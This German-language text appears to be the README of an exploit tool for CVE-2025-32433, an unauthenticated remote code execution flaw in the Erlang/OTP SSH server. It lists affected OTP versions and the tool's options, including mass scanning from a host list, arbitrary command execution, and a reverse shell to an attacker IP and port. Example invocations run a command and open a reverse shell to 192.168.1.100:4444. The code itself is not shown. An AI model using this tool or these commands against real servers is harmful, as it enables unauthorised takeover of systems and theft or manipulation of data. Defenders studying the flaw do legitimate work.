
Die Schwachstelle ermöglicht es einem Angreifer mit Netzwerkzugriff auf einen Erlang/OTP SSH-Server, beliebigen Code ohne vorherige Authentifizierung auszuführen.
Die Sicherheitslücke ermöglicht es einem Angreifer mit Netzwerkzugriff auf einen Erlang/OTP SSH-Server, ohne vorherige Authentifizierung beliebigen Code auszuführen.
Eine schwerwiegende Sicherheitslücke wurde im Erlang/OTP SSH-Server identifiziert, die es einem Angreifer ermöglichen kann, eine nicht authentifizierte Remote-Codeausführung (RCE) durchzuführen. Durch die Ausnutzung eines Fehlers in der Behandlung von SSH-Protokollnachrichten könnte ein böswilliger Akteur unbefugten Zugriff auf betroffene Systeme erlangen und ohne gültige Anmeldeinformationen beliebige Befehle ausführen. Dies könnte zur Kompromittierung der genannten Hosts führen und Dritten unbefugten Zugriff auf und Manipulation von sensiblen Daten ermöglichen oder Denial-of-Service-Angriffe verursachen.
OTP-27.3.2 und früher
OTP-26.2.5.10 und früher
OTP-25.3.2.19 und früher
python cve-2025-32433.py <host> [options]
Optionen:
-p PORT, --port PORT: SSH-Port (Standard: 22)
-t TIMEOUT, --timeout TIMEOUT: Verbindungs-Timeout in Sekunden (Standard: 5)
-c COMMAND, --command COMMAND: Benutzerdefinierter Befehl zur Ausführung
--check: Prüfen, ob das Ziel anfällig ist
-u urls.txt, --urlfile urls.txt: Datei mit Liste der zu scannenden Hosts (einer pro Zeile)
-o output.txt, --output output.txt: Ausgabedatei zum Speichern der Ergebnisse.
--shell: Reverse Shell starten
--lhost LHOST: IP des Angreifers für Reverse Shell
--lport LPORT: Port des Angreifers für Reverse Shell (Standard: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444